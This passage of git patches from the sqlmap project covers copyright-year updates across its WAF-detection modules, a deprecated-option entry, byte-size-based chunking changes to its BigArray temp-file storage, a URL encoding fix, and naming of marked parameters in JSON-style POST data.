 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/cloudflare.py b/waf/cloudflare.py
index c0aa259d9..cdae41bb4 100644
--- a/waf/cloudflare.py
+++ b/waf/cloudflare.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/datapower.py b/waf/datapower.py
index 5750f2a56..1dd60df25 100644
--- a/waf/datapower.py
+++ b/waf/datapower.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/denyall.py b/waf/denyall.py
index 3db1459a8..46189389b 100644
--- a/waf/denyall.py
+++ b/waf/denyall.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/dotdefender.py b/waf/dotdefender.py
index 6abe1d908..4cf42822c 100644
--- a/waf/dotdefender.py
+++ b/waf/dotdefender.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/edgecast.py b/waf/edgecast.py
index 0f37f5f3e..c59a3db68 100644
--- a/waf/edgecast.py
+++ b/waf/edgecast.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/expressionengine.py b/waf/expressionengine.py
index a3bbdf5a3..3db06cb21 100644
--- a/waf/expressionengine.py
+++ b/waf/expressionengine.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/fortiweb.py b/waf/fortiweb.py
index 99c2de225..a5200ab9e 100644
--- a/waf/fortiweb.py
+++ b/waf/fortiweb.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/hyperguard.py b/waf/hyperguard.py
index 421409222..677789f24 100644
--- a/waf/hyperguard.py
+++ b/waf/hyperguard.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/incapsula.py b/waf/incapsula.py
index 4c8a2d2d5..1b2196e55 100644
--- a/waf/incapsula.py
+++ b/waf/incapsula.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/isaserver.py b/waf/isaserver.py
index c3ab334de..c88cf4370 100644
--- a/waf/isaserver.py
+++ b/waf/isaserver.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/jiasule.py b/waf/jiasule.py
index 45601a8ae..3d088f74c 100644
--- a/waf/jiasule.py
+++ b/waf/jiasule.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/knownsec.py b/waf/knownsec.py
index 5fa0043b6..95fcae433 100644
--- a/waf/knownsec.py
+++ b/waf/knownsec.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/kona.py b/waf/kona.py
index d958ad9ec..731cd6f99 100644
--- a/waf/kona.py
+++ b/waf/kona.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/modsecurity.py b/waf/modsecurity.py
index d1d995452..673438f80 100644
--- a/waf/modsecurity.py
+++ b/waf/modsecurity.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/netcontinuum.py b/waf/netcontinuum.py
index b37a0ceba..c8a29774b 100644
--- a/waf/netcontinuum.py
+++ b/waf/netcontinuum.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/netscaler.py b/waf/netscaler.py
index 4afe51b18..fe6b817a2 100644
--- a/waf/netscaler.py
+++ b/waf/netscaler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/paloalto.py b/waf/paloalto.py
index 4e9974c87..6c281e575 100644
--- a/waf/paloalto.py
+++ b/waf/paloalto.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/profense.py b/waf/profense.py
index 4745c8bd3..2bd00b0e7 100644
--- a/waf/profense.py
+++ b/waf/profense.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/proventia.py b/waf/proventia.py
index a5def9a72..7630b3b54 100644
--- a/waf/proventia.py
+++ b/waf/proventia.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/radware.py b/waf/radware.py
index 3f1f356e7..72deba64c 100644
--- a/waf/radware.py
+++ b/waf/radware.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/requestvalidationmode.py b/waf/requestvalidationmode.py
index d1557255f..ad0abc9db 100644
--- a/waf/requestvalidationmode.py
+++ b/waf/requestvalidationmode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/safedog.py b/waf/safedog.py
index 2513e8133..63c7fdddd 100644
--- a/waf/safedog.py
+++ b/waf/safedog.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/secureiis.py b/waf/secureiis.py
index 6a2ad18df..425ebdfe5 100644
--- a/waf/secureiis.py
+++ b/waf/secureiis.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/senginx.py b/waf/senginx.py
index 0c154917a..a4bdb1bf2 100644
--- a/waf/senginx.py
+++ b/waf/senginx.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/sucuri.py b/waf/sucuri.py
index 1babc671e..61344628e 100644
--- a/waf/sucuri.py
+++ b/waf/sucuri.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/teros.py b/waf/teros.py
index 5811e67d1..99afbd8c3 100644
--- a/waf/teros.py
+++ b/waf/teros.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/trafficshield.py b/waf/trafficshield.py
index 873009ae9..e90c6671e 100644
--- a/waf/trafficshield.py
+++ b/waf/trafficshield.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/urlscan.py b/waf/urlscan.py
index 0e0fc8e3e..7d094482c 100644
--- a/waf/urlscan.py
+++ b/waf/urlscan.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/uspses.py b/waf/uspses.py
index a3b7281a5..e3192298f 100644
--- a/waf/uspses.py
+++ b/waf/uspses.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/varnish.py b/waf/varnish.py
index 4edffdbbb..a6f672fd0 100644
--- a/waf/varnish.py
+++ b/waf/varnish.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/webappsecure.py b/waf/webappsecure.py
index 6d1ec75bb..5faf88ebf 100644
--- a/waf/webappsecure.py
+++ b/waf/webappsecure.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/webknight.py b/waf/webknight.py
index c260faa44..11f82ee60 100644
--- a/waf/webknight.py
+++ b/waf/webknight.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

From 5920d16cf667e54dadfef17cfcd845f08117c241 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 6 Jan 2015 15:25:24 +0100
Subject: [PATCH 279/492] Adding a warning message for deprecated switch
 '--check-waf+

---
 lib/core/dicts.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/core/dicts.py b/lib/core/dicts.py
index 40d2892c6..0fa0f4685 100644
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@@ -215,6 +215,7 @@ DEPRECATED_OPTIONS = {
                         "--no-unescape": "use '--no-escape' instead",
                         "--binary": "use '--binary-fields' instead",
                         "--check-payload": None,
+                        "--check-waf": None,
                      }
 
 DUMP_DATA_PREPROCESS = {

From 2030311d5025adc91b9984311a3972624fb2012b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 7 Jan 2015 02:04:10 +0100
Subject: [PATCH 280/492] Patch for an Issue #1095

---
 lib/core/bigarray.py | 32 +++++++++++++++++++++++++++-----
 lib/core/settings.py |  2 +-
 2 files changed, 28 insertions(+), 6 deletions(-)

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index e1acee90f..52a9808d4 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -54,7 +54,7 @@ class BigArray(list):
             self.chunks.pop()
             try:
                 with open(self.chunks[-1], "rb") as fp:
-                    self.chunks[-1] = pickle.load(fp)
+                    self.chunks[-1] = self._load(fp)
             except IOError, ex:
                 errMsg = "exception occurred while retrieving data "
                 errMsg += "from a temporary file ('%s')" % ex
@@ -67,13 +67,35 @@ class BigArray(list):
                 return index
         return ValueError, "%s is not in list" % value
 
-    def _dump(self, value):
+    def _load(self, fp):
+        retval = []
+        unpickler = pickle.Unpickler(fp)
+        _ = unpickler.load()
+        if not isinstance(_, list):
+            retval.append(_)
+            while True:
+                try:
+                    retval.append(unpickler.load())
+                except EOFError:
+                    break
+        else:
+            retval = _
+        return retval
+
+    def _dump(self, chunk):
         try:
             handle, filename = tempfile.mkstemp(prefix=BIGARRAY_TEMP_PREFIX)
             self.filenames.add(filename)
             os.close(handle)
-            with open(filename, "w+b") as fp:
-                pickle.dump(value, fp, pickle.HIGHEST_PROTOCOL)
+            try:
+                with open(filename, "w+b") as fp:
+                    pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
+            except MemoryError:
+                with open(filename, "w+b") as fp:
+                    pickler = pickle.Pickler(fp, pickle.HIGHEST_PROTOCOL)
+                    pickler.fast = True
+                    for value in chunk:
+                        pickler.dump(value)
             return filename
         except IOError, ex:
             errMsg = "exception occurred while storing data "
@@ -87,7 +109,7 @@ class BigArray(list):
         if not (self.cache and self.cache.index == index):
             try:
                 with open(self.chunks[index], "rb") as fp:
-                    self.cache = Cache(index, pickle.load(fp), False)
+                    self.cache = Cache(index, self._load(fp), False)
             except IOError, ex:
                 errMsg = "exception occurred while retrieving data "
                 errMsg += "from a temporary file ('%s')" % ex
diff --git a/lib/core/settings.py b/lib/core/settings.py
index b15df978a..5d99f6c44 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -444,7 +444,7 @@ WAF_ATTACK_VECTORS = (
 ROTATING_CHARS = ('\\', '|', '|', '/', '-')
 
 # Chunk length (in items) used by BigArray objects (only last chunk and cached one are held in memory)
-BIGARRAY_CHUNK_LENGTH = 4096
+BIGARRAY_CHUNK_LENGTH = 1024
 
 # Prefix used for storing dumped chunks in BigArray objects
 BIGARRAY_TEMP_PREFIX = "sqlmapba-%d-" % os.getpid()

From c4c4ac13fe80b02e35fd82f07ceb9ea87c07e57b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 7 Jan 2015 09:21:02 +0100
Subject: [PATCH 281/492] Better patch for an Issue #1095

---
 lib/core/bigarray.py | 62 +++++++++++++++++++++-----------------------
 lib/core/settings.py |  4 +--
 2 files changed, 31 insertions(+), 35 deletions(-)

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index 52a9808d4..55c586b1b 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -11,12 +11,23 @@ except:
    import pickle
 
 import os
+import sys
 import tempfile
 
 from lib.core.exception import SqlmapSystemException
-from lib.core.settings import BIGARRAY_CHUNK_LENGTH
+from lib.core.settings import BIGARRAY_CHUNK_SIZE
 from lib.core.settings import BIGARRAY_TEMP_PREFIX
 
+def _size_of(object):
+    """
+    Returns total size of a given object (in bytes)
+    """
+
+    if hasattr(object, "__iter__"):
+        return sum(_size_of(_) for _ in object)
+    else:
+        return sys.getsizeof(object)
+
 class Cache(object):
     """
     Auxiliary class used for storing cached chunks
@@ -34,13 +45,20 @@ class BigArray(list):
 
     def __init__(self):
         self.chunks = [[]]
+        self.chunk_length = sys.maxint
         self.cache = None
         self.filenames = set()
         self._os_remove = os.remove
+        self._size_counter = 0
 
     def append(self, value):
         self.chunks[-1].append(value)
-        if len(self.chunks[-1]) >= BIGARRAY_CHUNK_LENGTH:
+        if self.chunk_length == sys.maxint:
+            self._size_counter += _size_of(value)
+            if self._size_counter >= BIGARRAY_CHUNK_SIZE:
+                self.chunk_length = len(self.chunks[-1])
+                self._size_counter = None
+        if len(self.chunks[-1]) >= self.chunk_length:
             filename = self._dump(self.chunks[-1])
             self.chunks[-1] = filename
             self.chunks.append([])
@@ -54,7 +72,7 @@ class BigArray(list):
             self.chunks.pop()
             try:
                 with open(self.chunks[-1], "rb") as fp:
-                    self.chunks[-1] = self._load(fp)
+                    self.chunks[-1] = pickle.load(fp)
             except IOError, ex:
                 errMsg = "exception occurred while retrieving data "
                 errMsg += "from a temporary file ('%s')" % ex
@@ -67,35 +85,13 @@ class BigArray(list):
                 return index
         return ValueError, "%s is not in list" % value
 
-    def _load(self, fp):
-        retval = []
-        unpickler = pickle.Unpickler(fp)
-        _ = unpickler.load()
-        if not isinstance(_, list):
-            retval.append(_)
-            while True:
-                try:
-                    retval.append(unpickler.load())
-                except EOFError:
-                    break
-        else:
-            retval = _
-        return retval
-
     def _dump(self, chunk):
         try:
             handle, filename = tempfile.mkstemp(prefix=BIGARRAY_TEMP_PREFIX)
             self.filenames.add(filename)
             os.close(handle)
-            try:
-                with open(filename, "w+b") as fp:
-                    pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
-            except MemoryError:
-                with open(filename, "w+b") as fp:
-                    pickler = pickle.Pickler(fp, pickle.HIGHEST_PROTOCOL)
-                    pickler.fast = True
-                    for value in chunk:
-                        pickler.dump(value)
+            with open(filename, "w+b") as fp:
+                pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
             return filename
         except IOError, ex:
             errMsg = "exception occurred while storing data "
@@ -109,7 +105,7 @@ class BigArray(list):
         if not (self.cache and self.cache.index == index):
             try:
                 with open(self.chunks[index], "rb") as fp:
-                    self.cache = Cache(index, self._load(fp), False)
+                    self.cache = Cache(index, pickle.load(fp), False)
             except IOError, ex:
                 errMsg = "exception occurred while retrieving data "
                 errMsg += "from a temporary file ('%s')" % ex
@@ -133,8 +129,8 @@ class BigArray(list):
     def __getitem__(self, y):
         if y < 0:
             y += len(self)
-        index = y / BIGARRAY_CHUNK_LENGTH
-        offset = y % BIGARRAY_CHUNK_LENGTH
+        index = y / self.chunk_length
+        offset = y % self.chunk_length
         chunk = self.chunks[index]
         if isinstance(chunk, list):
             return chunk[offset]
@@ -143,8 +139,8 @@ class BigArray(list):
             return self.cache.data[offset]
 
     def __setitem__(self, y, value):
-        index = y / BIGARRAY_CHUNK_LENGTH
-        offset = y % BIGARRAY_CHUNK_LENGTH
+        index = y / self.chunk_length
+        offset = y % self.chunk_length
         chunk = self.chunks[index]
         if isinstance(chunk, list):
             chunk[offset] = value
@@ -161,4 +157,4 @@ class BigArray(list):
             yield self[i]
 
     def __len__(self):
-        return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * BIGARRAY_CHUNK_LENGTH + len(self.chunks[-1])
+        return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 5d99f6c44..c0a6ae523 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -443,8 +443,8 @@ WAF_ATTACK_VECTORS = (
 # Used for status representation in dictionary attack phase
 ROTATING_CHARS = ('\\', '|', '|', '/', '-')
 
-# Chunk length (in items) used by BigArray objects (only last chunk and cached one are held in memory)
-BIGARRAY_CHUNK_LENGTH = 1024
+# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
+BIGARRAY_CHUNK_SIZE = 1024 * 1024
 
 # Prefix used for storing dumped chunks in BigArray objects
 BIGARRAY_TEMP_PREFIX = "sqlmapba-%d-" % os.getpid()

From 83add9fd9b837af6f896b8934833187154fe0232 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 7 Jan 2015 10:46:06 +0100
Subject: [PATCH 282/492] Minor patch

---
 lib/core/bigarray.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index 55c586b1b..d62588c21 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -23,10 +23,10 @@ def _size_of(object):
     Returns total size of a given object (in bytes)
     """
 
+    retval = sys.getsizeof(object)
     if hasattr(object, "__iter__"):
-        return sum(_size_of(_) for _ in object)
-    else:
-        return sys.getsizeof(object)
+        retval += sum(_size_of(_) for _ in object)
+    return retval
 
 class Cache(object):
     """

From 47af7dfe6a7ed3f969f83dfea4223773c5bdf87c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 7 Jan 2015 10:49:15 +0100
Subject: [PATCH 283/492] Another minor patch

---
 lib/core/bigarray.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index d62588c21..faf499ba0 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -10,6 +10,7 @@ try:
 except:
    import pickle
 
+import itertools
 import os
 import sys
 import tempfile
@@ -24,7 +25,9 @@ def _size_of(object):
     """
 
     retval = sys.getsizeof(object)
-    if hasattr(object, "__iter__"):
+    if isinstance(object, dict):
+        retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object.items()))
+    elif hasattr(object, "__iter__"):
         retval += sum(_size_of(_) for _ in object)
     return retval
 

From 30b9f3d5562a7398466d89c1afb02651fc41d592 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 7 Jan 2015 10:53:57 +0100
Subject: [PATCH 284/492] Minor update

---
 lib/core/bigarray.py | 16 +++++++++-------
 1 file changed, 9 insertions(+), 7 deletions(-)

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index faf499ba0..01b45992a 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -19,16 +19,18 @@ from lib.core.exception import SqlmapSystemException
 from lib.core.settings import BIGARRAY_CHUNK_SIZE
 from lib.core.settings import BIGARRAY_TEMP_PREFIX
 
-def _size_of(object):
+DEFAULT_SIZE_OF = sys.getsizeof(object())
+
+def _size_of(object_):
     """
-    Returns total size of a given object (in bytes)
+    Returns total size of a given object_ (in bytes)
     """
 
-    retval = sys.getsizeof(object)
-    if isinstance(object, dict):
-        retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object.items()))
-    elif hasattr(object, "__iter__"):
-        retval += sum(_size_of(_) for _ in object)
+    retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)
+    if isinstance(object_, dict):
+        retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
+    elif hasattr(object_, "__iter__"):
+        retval += sum(_size_of(_) for _ in object_)
     return retval
 
 class Cache(object):

From 450b3c93cb9c8658328400438af26a5f6891392e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 7 Jan 2015 11:40:11 +0100
Subject: [PATCH 285/492] Potential patch for an Issue #1093

---
 lib/request/connect.py | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index a09d710f3..fa17c28a9 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -263,10 +263,6 @@ class Connect(object):
         # support those by default
         url = asciifyUrl(url)
 
-        # fix for known issues when using url in unicode format
-        # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case)
-        url = unicodeencode(url)
-
         try:
             socket.setdefaulttimeout(timeout)
 
@@ -353,6 +349,7 @@ class Connect(object):
                 del headers[key]
                 headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)
 
+            url = unicodeencode(url)
             post = unicodeencode(post, kb.pageEncoding)
 
             if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):

From 49982bce9c00d32dc8ece24acd53b58ff66a597c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 7 Jan 2015 16:03:37 +0100
Subject: [PATCH 286/492] Trivial update

---
 lib/core/target.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index 464cc3f93..355abb159 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -181,7 +181,7 @@ def _setRequestParams():
                     kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
 
             elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
-                message = "Multipart like data found in %s data. " % conf.method
+                message = "Multipart-like data found in %s data. " % conf.method
                 message += "Do you want to process it? [Y/n/q] "
                 test = readInput(message, default="Y")
                 if test and test[0] in ("q", "Q"):

From c8d4df6eba81a7d532ce6bcdf1754aeb78e9bfc4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 7 Jan 2015 22:09:40 +0100
Subject: [PATCH 287/492] Adding names to parameters in structured POST
 requests (e.g. JSON)

---
 lib/core/target.py | 14 ++++++++++++--
 1 file changed, 12 insertions(+), 2 deletions(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index 355abb159..7ddb2eab6 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -97,6 +97,7 @@ def _setRequestParams():
 
     if conf.data is not None:
         conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
+        hintNames = []
 
         def process(match, repl):
             retVal = match.group(0)
@@ -109,7 +110,8 @@ def _setRequestParams():
                         retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
                     else:
                         break
-
+                if CUSTOM_INJECTION_MARK_CHAR in retVal:
+                    hintNames.append((retVal.split(CUSTOM_INJECTION_MARK_CHAR)[0], match.group("name")))
             return retVal
 
         if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data:
@@ -280,7 +282,15 @@ def _setRequestParams():
                     parts = value.split(CUSTOM_INJECTION_MARK_CHAR)
 
                     for i in xrange(len(parts) - 1):
-                        conf.paramDict[place]["%s#%d%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
+                        name = None
+                        if kb.postHint:
+                            for ending, _ in hintNames:
+                                if parts[i].endswith(ending):
+                                    name = "%s %s" % (kb.postHint, _)
+                                    break
+                        if name is None:
+                            name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)
+                        conf.paramDict[place][name] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
 
                     if place == PLACE.URI and PLACE.GET in conf.paramDict:
                         del conf.paramDict[PLACE.GET]

From 0c4d63fb00650f9cb656fdc28eb50c7e26dd80e7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 8 Jan 2015 09:00:21 +0100
Subject: [PATCH 288/492] Bug fix (reported by user over ML)

---
 lib/controller/handler.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index b360c0b46..471070b1b 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -72,7 +72,7 @@ def setHandler():
